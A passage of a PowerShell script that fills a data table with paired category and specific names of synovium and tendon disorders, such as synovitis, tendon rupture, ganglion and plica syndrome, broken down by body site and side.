$DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, thigh","Other synovitis and tenosynovitis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, lower leg","Other synovitis and tenosynovitis, right lower leg") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, lower leg","Other synovitis and tenosynovitis, left lower leg") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, lower leg","Other synovitis and tenosynovitis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, ankle and foot","Other synovitis and tenosynovitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, ankle and foot","Other synovitis and tenosynovitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, ankle and foot","Other synovitis and tenosynovitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, other site","Other synovitis and tenosynovitis, other site") + $null = $DiagnosisList.Rows.Add("Other synovitis and tenosynovitis, multiple sites","Other synovitis and tenosynovitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Synovitis and tenosynovitis, unspecified","Synovitis and tenosynovitis, unspecified") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of synovium and tendon","Rupture of popliteal cyst") + $null = $DiagnosisList.Rows.Add("Rupture of synovium","Rupture of synovium, unspecified joint") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, shoulder","Rupture of synovium, right shoulder") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, shoulder","Rupture of synovium, left shoulder") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, shoulder","Rupture of synovium, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, elbow","Rupture of synovium, right elbow") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, elbow","Rupture of synovium, left elbow") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, elbow","Rupture of synovium, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, wrist","Rupture of synovium, right wrist") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, wrist","Rupture of synovium, left wrist") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, wrist","Rupture of synovium, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hand and fingers","Rupture of synovium, right hand") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hand and fingers","Rupture of synovium, left hand") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hand and fingers","Rupture of synovium, unspecified hand") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hand and fingers","Rupture of synovium, right finger(s)") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hand and fingers","Rupture of synovium, left finger(s)") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hand and fingers","Rupture of synovium, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hip","Rupture of synovium, right hip") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hip","Rupture of synovium, left hip") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, hip","Rupture of synovium, unspecified hip") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, right ankle") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, left ankle") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, right foot") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, left foot") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, unspecified foot") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, right toe(s)") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, left toe(s)") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, ankle, foot and toes","Rupture of synovium, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Rupture of synovium, other site","Rupture of synovium, other site") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons","Spontaneous rupture of extensor tendons, unspecified site") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, shoulder","Spontaneous rupture of extensor tendons, right shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, shoulder","Spontaneous rupture of extensor tendons, left shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, shoulder","Spontaneous rupture of extensor tendons, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, upper arm","Spontaneous rupture of extensor tendons, right upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, upper arm","Spontaneous rupture of extensor tendons, left upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, upper arm","Spontaneous rupture of extensor tendons, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, forearm","Spontaneous rupture of extensor tendons, right forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, forearm","Spontaneous rupture of extensor tendons, left forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, forearm","Spontaneous rupture of extensor tendons, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, hand","Spontaneous rupture of extensor tendons, right hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, hand","Spontaneous rupture of extensor tendons, left hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, hand","Spontaneous rupture of extensor tendons, unspecified hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, thigh","Spontaneous rupture of extensor tendons, right thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, thigh","Spontaneous rupture of extensor tendons, left thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, thigh","Spontaneous rupture of extensor tendons, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, lower leg","Spontaneous rupture of extensor tendons, right lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, lower leg","Spontaneous rupture of extensor tendons, left lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, lower leg","Spontaneous rupture of extensor tendons, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, ankle and foot","Spontaneous rupture of extensor tendons, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, ankle and foot","Spontaneous rupture of extensor tendons, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, ankle and foot","Spontaneous rupture of extensor tendons, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, other site","Spontaneous rupture of extensor tendons, other site") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of extensor tendons, multiple sites","Spontaneous rupture of extensor tendons, multiple sites") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons","Spontaneous rupture of flexor tendons, unspecified site") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, shoulder","Spontaneous rupture of flexor tendons, right shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, shoulder","Spontaneous rupture of flexor tendons, left shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, shoulder","Spontaneous rupture of flexor tendons, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, upper arm","Spontaneous rupture of flexor tendons, right upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, upper arm","Spontaneous rupture of flexor tendons, left upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, upper arm","Spontaneous rupture of flexor tendons, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, forearm","Spontaneous rupture of flexor tendons, right forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, forearm","Spontaneous rupture of flexor tendons, left forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, forearm","Spontaneous rupture of flexor tendons, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, hand","Spontaneous rupture of flexor tendons, right hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, hand","Spontaneous rupture of flexor tendons, left hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, hand","Spontaneous rupture of flexor tendons, unspecified hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, thigh","Spontaneous rupture of flexor tendons, right thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, thigh","Spontaneous rupture of flexor tendons, left thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, thigh","Spontaneous rupture of flexor tendons, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, lower leg","Spontaneous rupture of flexor tendons, right lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, lower leg","Spontaneous rupture of flexor tendons, left lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, lower leg","Spontaneous rupture of flexor tendons, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, ankle and foot","Spontaneous rupture of flexor tendons, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, ankle and foot","Spontaneous rupture of flexor tendons, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, ankle and foot","Spontaneous rupture of flexor tendons, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, other site","Spontaneous rupture of flexor tendons, other site") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of flexor tendons, multiple sites","Spontaneous rupture of flexor tendons, multiple sites") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons","Spontaneous rupture of other tendons, unspecified site") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, shoulder","Spontaneous rupture of other tendons, right shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, shoulder","Spontaneous rupture of other tendons, left shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, shoulder","Spontaneous rupture of other tendons, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, upper arm","Spontaneous rupture of other tendons, right upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, upper arm","Spontaneous rupture of other tendons, left upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, upper arm","Spontaneous rupture of other tendons, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, forearm","Spontaneous rupture of other tendons, right forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, forearm","Spontaneous rupture of other tendons, left forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, forearm","Spontaneous rupture of other tendons, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, hand","Spontaneous rupture of other tendons, right hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, hand","Spontaneous rupture of other tendons, left hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, hand","Spontaneous rupture of other tendons, unspecified hand") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, thigh","Spontaneous rupture of other tendons, right thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, thigh","Spontaneous rupture of other tendons, left thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, thigh","Spontaneous rupture of other tendons, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, lower leg","Spontaneous rupture of other tendons, right lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, lower leg","Spontaneous rupture of other tendons, left lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, lower leg","Spontaneous rupture of other tendons, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, ankle and foot","Spontaneous rupture of other tendons, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, ankle and foot","Spontaneous rupture of other tendons, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, ankle and foot","Spontaneous rupture of other tendons, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, other","Spontaneous rupture of other tendons, other") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of other tendons, multiple sites","Spontaneous rupture of other tendons, multiple sites") + $null = $DiagnosisList.Rows.Add("Spontaneous rupture of unspecified tendon","Spontaneous rupture of unspecified tendon") + $null = $DiagnosisList.Rows.Add("Short Achilles tendon (acquired)","Short Achilles tendon (acquired), unspecified ankle") + $null = $DiagnosisList.Rows.Add("Short Achilles tendon (acquired)","Short Achilles tendon (acquired), right ankle") + $null = $DiagnosisList.Rows.Add("Short Achilles tendon (acquired)","Short Achilles tendon (acquired), left ankle") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified","Synovial hypertrophy, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, shoulder","Synovial hypertrophy, not elsewhere classified, right shoulder") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, shoulder","Synovial hypertrophy, not elsewhere classified, left shoulder") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, shoulder","Synovial hypertrophy, not elsewhere classified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, upper arm","Synovial hypertrophy, not elsewhere classified, right upper arm") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, upper arm","Synovial hypertrophy, not elsewhere classified, left upper arm") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, upper arm","Synovial hypertrophy, not elsewhere classified, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, forearm","Synovial hypertrophy, not elsewhere classified, right forearm") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, forearm","Synovial hypertrophy, not elsewhere classified, left forearm") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, forearm","Synovial hypertrophy, not elsewhere classified, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, hand","Synovial hypertrophy, not elsewhere classified, right hand") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, hand","Synovial hypertrophy, not elsewhere classified, left hand") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, hand","Synovial hypertrophy, not elsewhere classified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, thigh","Synovial hypertrophy, not elsewhere classified, right thigh") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, thigh","Synovial hypertrophy, not elsewhere classified, left thigh") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, thigh","Synovial hypertrophy, not elsewhere classified, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, lower leg","Synovial hypertrophy, not elsewhere classified, right lower leg") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, lower leg","Synovial hypertrophy, not elsewhere classified, left lower leg") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, lower leg","Synovial hypertrophy, not elsewhere classified, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, ankle and foot","Synovial hypertrophy, not elsewhere classified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, ankle and foot","Synovial hypertrophy, not elsewhere classified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, ankle and foot","Synovial hypertrophy, not elsewhere classified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, other site","Synovial hypertrophy, not elsewhere classified, other site") + $null = $DiagnosisList.Rows.Add("Synovial hypertrophy, not elsewhere classified, multiple sites","Synovial hypertrophy, not elsewhere classified, multiple sites") + $null = $DiagnosisList.Rows.Add("Transient synovitis","Transient synovitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Transient synovitis, shoulder","Transient synovitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Transient synovitis, shoulder","Transient synovitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Transient synovitis, shoulder","Transient synovitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Transient synovitis, elbow","Transient synovitis, right elbow") + $null = $DiagnosisList.Rows.Add("Transient synovitis, elbow","Transient synovitis, left elbow") + $null = $DiagnosisList.Rows.Add("Transient synovitis, elbow","Transient synovitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Transient synovitis, wrist","Transient synovitis, right wrist") + $null = $DiagnosisList.Rows.Add("Transient synovitis, wrist","Transient synovitis, left wrist") + $null = $DiagnosisList.Rows.Add("Transient synovitis, wrist","Transient synovitis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Transient synovitis, hand","Transient synovitis, right hand") + $null = $DiagnosisList.Rows.Add("Transient synovitis, hand","Transient synovitis, left hand") + $null = $DiagnosisList.Rows.Add("Transient synovitis, hand","Transient synovitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Transient synovitis, hip","Transient synovitis, right hip") + $null = $DiagnosisList.Rows.Add("Transient synovitis, hip","Transient synovitis, left hip") + $null = $DiagnosisList.Rows.Add("Transient synovitis, hip","Transient synovitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Transient synovitis, knee","Transient synovitis, right knee") + $null = $DiagnosisList.Rows.Add("Transient synovitis, knee","Transient synovitis, left knee") + $null = $DiagnosisList.Rows.Add("Transient synovitis, knee","Transient synovitis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Transient synovitis, ankle and foot","Transient synovitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Transient synovitis, ankle and foot","Transient synovitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Transient synovitis, ankle and foot","Transient synovitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Transient synovitis, other site","Transient synovitis, other site") + $null = $DiagnosisList.Rows.Add("Transient synovitis, multiple sites","Transient synovitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Ganglion","Ganglion, unspecified site") + $null = $DiagnosisList.Rows.Add("Ganglion, shoulder","Ganglion, right shoulder") + $null = $DiagnosisList.Rows.Add("Ganglion, shoulder","Ganglion, left shoulder") + $null = $DiagnosisList.Rows.Add("Ganglion, shoulder","Ganglion, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Ganglion, elbow","Ganglion, right elbow") + $null = $DiagnosisList.Rows.Add("Ganglion, elbow","Ganglion, left elbow") + $null = $DiagnosisList.Rows.Add("Ganglion, elbow","Ganglion, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Ganglion, wrist","Ganglion, right wrist") + $null = $DiagnosisList.Rows.Add("Ganglion, wrist","Ganglion, left wrist") + $null = $DiagnosisList.Rows.Add("Ganglion, wrist","Ganglion, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Ganglion, hand","Ganglion, right hand") + $null = $DiagnosisList.Rows.Add("Ganglion, hand","Ganglion, left hand") + $null = $DiagnosisList.Rows.Add("Ganglion, hand","Ganglion, unspecified hand") + $null = $DiagnosisList.Rows.Add("Ganglion, hip","Ganglion, right hip") + $null = $DiagnosisList.Rows.Add("Ganglion, hip","Ganglion, left hip") + $null = $DiagnosisList.Rows.Add("Ganglion, hip","Ganglion, unspecified hip") + $null = $DiagnosisList.Rows.Add("Ganglion, knee","Ganglion, right knee") + $null = $DiagnosisList.Rows.Add("Ganglion, knee","Ganglion, left knee") + $null = $DiagnosisList.Rows.Add("Ganglion, knee","Ganglion, unspecified knee") + $null = $DiagnosisList.Rows.Add("Ganglion, ankle and foot","Ganglion, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Ganglion, ankle and foot","Ganglion, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Ganglion, ankle and foot","Ganglion, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Ganglion, other site","Ganglion, other site") + $null = $DiagnosisList.Rows.Add("Ganglion, multiple sites","Ganglion, multiple sites") + $null = $DiagnosisList.Rows.Add("Plica syndrome","Plica syndrome, unspecified knee") + $null = $DiagnosisList.Rows.Add("Plica syndrome","Plica syndrome, right knee") + $null = $DiagnosisList.Rows.Add("Plica syndrome","Plica syndrome, left knee") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon","Other specified disorders of synovium and tendon, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, shoulder","Other specified disorders of synovium, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, shoulder","Other specified disorders of synovium, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, shoulder","Other specified disorders of tendon, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, shoulder","Other specified disorders of tendon, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, shoulder","Other specified disorders of synovium and tendon, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, elbow","Other specified disorders of synovium, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, elbow","Other specified disorders of synovium, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, elbow","Other specified disorders of tendon, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, elbow","Other specified disorders of tendon, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, elbow","Other specified disorders of synovium and tendon, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, wrist","Other specified disorders of synovium, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, wrist","Other specified disorders of synovium, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, wrist","Other specified disorders of tendon, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, wrist","Other specified disorders of tendon, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, wrist","Other specified disorders of synovium and tendon, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hand","Other specified disorders of synovium, right hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hand","Other specified disorders of synovium, left hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hand","Other specified disorders of tendon, right hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hand","Other specified disorders of tendon, left hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hand","Other specified disorders of synovium and tendon, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hip","Other specified disorders of synovium, right hip") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hip","Other specified disorders of synovium, left hip") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hip","Other specified disorders of tendon, right hip") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hip","Other specified disorders of tendon, left hip") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, hip","Other specified disorders of synovium and tendon, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, knee","Other specified disorders of synovium, right knee") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, knee","Other specified disorders of synovium, left knee") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, knee","Other specified disorders of tendon, right knee") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, knee","Other specified disorders of tendon, left knee") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, knee","Other specified disorders of synovium and tendon, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, ankle and foot","Other specified disorders of synovium, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, ankle and foot","Other specified disorders of synovium, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, ankle and foot","Other specified disorders of tendon, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, ankle and foot","Other specified disorders of tendon, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, ankle and foot","Other specified disorders of synovium and tendon, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, other site","Other specified disorders of synovium and tendon, other site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of synovium and tendon, multiple sites","Other specified disorders of synovium and tendon, multiple sites") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon","Unspecified disorder of synovium and tendon, unspecified site") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, shoulder","Unspecified disorder of synovium and tendon, right shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, shoulder","Unspecified disorder of synovium and tendon, left shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, shoulder","Unspecified disorder of synovium and tendon, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, upper arm","Unspecified disorder of synovium and tendon, right upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, upper arm","Unspecified disorder of synovium and tendon, left upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, upper arm","Unspecified disorder of synovium and tendon, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, forearm","Unspecified disorder of synovium and tendon, right forearm") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, forearm","Unspecified disorder of synovium and tendon, left forearm") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, forearm","Unspecified disorder of synovium and tendon, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, hand","Unspecified disorder of synovium and tendon, right hand") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, hand","Unspecified disorder of synovium and tendon, left hand") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, hand","Unspecified disorder of synovium and tendon, unspecified hand") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, thigh","Unspecified disorder of synovium and tendon, right thigh") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, thigh","Unspecified disorder of synovium and tendon, left thigh") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, thigh","Unspecified disorder of synovium and tendon, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, lower leg","Unspecified disorder of synovium and tendon, right lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, lower leg","Unspecified disorder of synovium and tendon, left lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, lower leg","Unspecified disorder of synovium and tendon, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, ankle and foot","Unspecified disorder of synovium and tendon, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, ankle and foot","Unspecified disorder of synovium and tendon, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, ankle and foot","Unspecified disorder of synovium and tendon, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, other site","Unspecified disorder of synovium and tendon, other site") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of synovium and tendon, multiple sites","Unspecified disorder of synovium and tendon, multiple sites") + $null = $DiagnosisList.Rows.Add("Crepitant synovitis (acute) (chronic), wrist","Crepitant synovitis (acute) (chronic), right wrist") + $null = $DiagnosisList.Rows.Add("Crepitant synovitis (acute) (chronic), wrist","Crepitant synovitis (acute) (chronic), left wrist") + $null = $DiagnosisList.Rows.Add("Crepitant synovitis (acute) (chronic), wrist","Crepitant synovitis (acute) (chronic), unspecified wrist") + $null = $DiagnosisList.Rows.Add("Crepitant synovitis (acute) (chronic), hand","Crepitant synovitis (acute) (chronic), right hand") + $null = $DiagnosisList.Rows.Add("Crepitant synovitis (acute) (chronic), hand","Crepitant synovitis (acute) (chronic), left hand") + $null = 